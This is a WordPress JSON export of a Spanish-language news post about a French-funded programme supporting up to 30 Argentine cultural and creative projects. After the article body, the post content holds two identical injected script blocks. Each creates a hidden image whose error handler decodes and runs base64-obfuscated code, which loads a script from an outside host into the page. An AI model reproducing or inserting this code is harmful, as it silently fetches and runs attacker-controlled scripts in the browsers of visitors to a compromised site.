{"id":4147,"date":"2024-06-26T12:42:23","date_gmt":"2024-06-26T15:42:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4147"},"modified":"2025-08-13T23:53:50","modified_gmt":"2025-08-14T02:53:50","slug":"francia-ofrece-inedito-apoyo-financiero-a-30-proyectos-de-la-industria-cultural-argentina","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4147","title":{"rendered":"Francia ofrece \u201cin\u00e9dito\u201d apoyo financiero a 30 proyectos de la industria cultural argentina"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a4614e2b81eaed19052334d265d80199\" style=\"background-color:#5e5b5b\"><em>La embajada francesa en Buenos Aires\u00a0<strong>lanz\u00f3 la convocatoria del programa de cooperaci\u00f3n entre Francia y Argentina \u201cOrillas Nuevas ~ Nouveaux Rivages\u201d<\/strong>\u00a0destinado a imaginativos proyectos del \u00e1mbito de las industrias culturales y creativas (ICC) en Argentina, en pos de la consolidaci\u00f3n de la relaci\u00f3n cultural entre ambos pa\u00edses.<\/em><\/h4>\n\n\n\n<p>Este programa \u201cin\u00e9dito\u201d de apoyo, financiamiento e internacionalizaci\u00f3n de las industrias culturales y creativas e Argentina es organizado por el Instituto Franc\u00e9s de Argentina junto con la Embajada de Francia junto con \u201cun apoyo excepcional del Ministerio franc\u00e9s de Asuntos Exteriores\u201d que aporta 1 mill\u00f3n de euros, seg\u00fan destacan desde la embajada gala.&nbsp;<\/p>\n\n\n\n<p>A su vez, el programa de 18 meses de duraci\u00f3n bajo el nombre&nbsp;<strong>\u201cOrillas nuevas ~ Nouveaux Rivages\u201d<\/strong>, se realiza en colaboraci\u00f3n con las locales Fundaci\u00f3n Williams y participaci\u00f3n de la Fundaci\u00f3n Medif\u00e9.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">La convocatoria<\/h2>\n\n\n\n<p>La convocatoria nacional abierta entre el 25 de junio al 31 de julio est\u00e1 dirigida a artistas, creadores y profesionales de todo el ecosistema de las industrias culturales y creativas del pa\u00eds, a los que busca identificar y acompa\u00f1ar.&nbsp;<\/p>\n\n\n\n<p>Se seleccionar\u00e1n<strong>&nbsp;hasta 30 proyectos que deber\u00e1n tener como requisito el encontrarse en una etapa inicial o m\u00e1s avanzada de desarrollo<\/strong>, que podr\u00e1n ser presentados por individuos, colectivos, empresas, y organizaciones sin fines de lucro radicados en Argentina, estipulan.<\/p>\n\n\n\n<p>Como requisito se pide ser argentino mayor de 18 a\u00f1os que vivan en el pa\u00eds o extranjeros mayores de 18 a\u00f1os con m\u00e1s de 5 a\u00f1os de residencia legal en Argentina, y en el caso de las personas jur\u00eddicas aceptan postulaciones de empresas u organizaciones sin fines de lucro que tengan raz\u00f3n social en Argentina y acrediten dos a\u00f1os de experiencia en el \u00e1mbito cultural del pa\u00eds.<\/p>\n\n\n\n<p>Se trata de un&nbsp;<strong>programa de expansi\u00f3n de proyectos<\/strong>&nbsp;que trabaja sobre tres dimensiones como son: el&nbsp;<strong>acompa\u00f1amiento profesional, financiamiento desde 10.000 hasta 20.000 euros por proyecto como tope, y becas de movilidad<\/strong>&nbsp;para presentarlos en el exterior.<\/p>\n\n\n\n<p>El programa cuenta con \u201c1 mill\u00f3n de euros de subsidios del Ministerio franc\u00e9s de Asuntos Exteriores, de los cuales 400.000 euros de becas de financiaci\u00f3n\u201d.&nbsp;<\/p>\n\n\n\n<p>En el caso de proyectos individuales o grupales de creaci\u00f3n art\u00edstica y para proyectos de organizaciones sin fines de lucro la Fundaci\u00f3n Williams financiar\u00e1 con 3.000 d\u00f3lares.&nbsp;<\/p>\n\n\n\n<p><strong>\u201cDeseamos que sea un proyecto transformador que dinamice la relaci\u00f3n cultural entre nuestros dos pa\u00edses.&nbsp;<\/strong>Como lo sugiere su nombre, el programa aspira a que los creadores puedan incursionar nuevos espacios de creaci\u00f3n y que eso se haga en un contacto entre nuestros dos pa\u00edses\u201d.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/somostelam.com.ar\/wp-content\/uploads\/2024\/06\/169-Embajada-francesa-proyectos-culturales-foto-prensa-1024x576.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u201cArgentinos y franceses compartimos el concepto de que la cultura, m\u00e1s all\u00e1 de su enorme peso econ\u00f3mico, es una herramienta invaluable de desarrollo social, un vector de innovaci\u00f3n, una forma de relacionarse con el mundo: es el lugar donde se piensa nuestro futuro, donde se elabora\u201d, indican.<\/p>\n\n\n\n<p>En s\u00ed, el programa busca participar en la<strong>&nbsp;consolidaci\u00f3n del campo de la cultura en Argentina y de su visibilidad regional y en el mundo.<\/strong><\/p>\n\n\n\n<p>Abierta a&nbsp;<strong>proyectos h\u00edbridos y transdisciplinarios<\/strong>, presta atenci\u00f3n a videojuegos, animaci\u00f3n, creaci\u00f3n digital, danza y teatro contempor\u00e1neos, as\u00ed como a proyectos de perfil cultural vinculados al sector editorial, la arquitectura y al dise\u00f1o.<\/p>\n\n\n\n<p>Adem\u00e1s&nbsp;<strong>aceptar\u00e1n proyectos provenientes de otras \u00e1reas de las ICC<\/strong>&nbsp;aunque la b\u00fasqueda se orienta a \u201cproyectos novedosos que no repitan los modos de organizaci\u00f3n tradicionales de los procesos creativos y que exploren creativamente los modos de&nbsp;<strong>creaci\u00f3n, producci\u00f3n y difusi\u00f3n del sector de las ICC\u201d<\/strong>, para lo cual \u201cdeber\u00e1n ser ambiciosos, con capacidad de escalar, nutrirse y con un alto potencial de proyecci\u00f3n internacional\u201d, se\u00f1alan.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">El jurado<\/h2>\n\n\n\n<p>Las postulaciones ser\u00e1n evaluadas por un jurado internacional integrado por especialistas franceses y argentinos vinculados a las ICC, y por los equipos t\u00e9cnicos del IFA y la Fundaci\u00f3n Williams. Entre los criterios de evaluaci\u00f3n estar\u00e1 el grado de innovaci\u00f3n, el alcance, viabilidad, entre otras cuestiones.&nbsp;<\/p>\n\n\n\n<p>\u201cEs un programa franco-argentino en el que el di\u00e1logo profesional y el intercambio de experiencias y de conocimiento, ocupan un lugar central\u201d, destacan.<\/p>\n\n\n\n<p>\u201cEstoy convencido de que el programa Orillas Nuevas puede marcar un hito en la hist\u00f3rica relaci\u00f3n cultural franco-argentina y demostrar su relevancia en estos tiempos dif\u00edciles\u201d, se\u00f1al\u00f3 el Embajador de Francia, Romain Nadal.<\/p>\n\n\n\n<p>Por su parte, el&nbsp;<strong>Director del Institut fran\u00e7ais d\u2019Argentine, Fr\u00e9d\u00e9ric Depetris<\/strong>, se\u00f1al\u00f3 que con esta convocatoria esperan&nbsp;<strong>\u201cdar un impulso significativo a la tan renombrada creaci\u00f3n argentina,&nbsp;<\/strong>y generar eventualmente ganas de cooperaci\u00f3n o co-producci\u00f3n entre creadores argentinos y franceses\u201d, y el deseo de contribuir al florecimiento de \u201cuna nueva generaci\u00f3n de profesionales de la cultura y acompa\u00f1ar proyectos novedosos con alto potencial de internacionalizaci\u00f3n\u201d.&nbsp;<\/p>\n\n\n\n<p>\u201cEstamos convencidos de que la tan renombrada creatividad argentina no nos dejar\u00e1 de sorprender: en alg\u00fan lugar de este gran pa\u00eds se est\u00e1n ingeniando iniciativas tan originales que sobrepasan nuestra imaginaci\u00f3n. Son aquellas que esperamos revelar: las que construir\u00e1n el horizonte cultural y creativo del ma\u00f1ana\u201d, expres\u00f3.<\/p>\n\n\n\n<p><strong>El Instituto franc\u00e9s de Argentina (IFA) forma parte de la Embajada de Francia&nbsp;<\/strong>en Argentina y es uno de los 96 Institutos franceses en el mundo. El IFA define, financia y maneja las acciones y proyectos de Francia en Argentina en los \u00e1mbitos cultural, universitario y cient\u00edfico, informan.<\/p>\n\n\n\n<p>El d\u00eda 12 de julio a las 14 realizar\u00e1n un webinar informativo por Zoom. Para m\u00e1s informaci\u00f3n sobre las bases y condiciones, y aplicar a la convocatoria se puede consultar la p\u00e1gina&nbsp;<a href=\"http:\/\/www.orillasnuevas.org\/\">www.orillasnuevas.org<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/somostelam.com.ar\/noticias\/politica\/francia-reparte-un-millon-de-euros-en-30-proyectos-de-la-industria-cultural-argentina\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"632\" height=\"108\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_22-4-2024_203638_somostelam.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-3944\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_22-4-2024_203638_somostelam.com_.ar_.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/04\/Captura-de-pantalla_22-4-2024_203638_somostelam.com_.ar_-300x51.jpeg 300w\" sizes=\"(max-width: 632px) 100vw, 632px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La embajada francesa en Buenos Aires\u00a0lanz\u00f3 la convocatoria del programa de cooperaci\u00f3n entre Francia y Argentina \u201cOrillas Nuevas ~ Nouveaux Rivages\u201d\u00a0destinado a imaginativos proyectos del \u00e1mbito de las industrias culturales y creativas (ICC) en Argentina, en pos de la consolidaci\u00f3n de la relaci\u00f3n cultural entre ambos pa\u00edses. Este programa \u201cin\u00e9dito\u201d de apoyo, financiamiento e internacionalizaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4148,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,22],"tags":[],"class_list":{"0":"post-4147","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4147"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4147"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4147\/revisions"}],"predecessor-version":[{"id":6756,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4147\/revisions\/6756"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4148"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4147"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4147"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4147"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}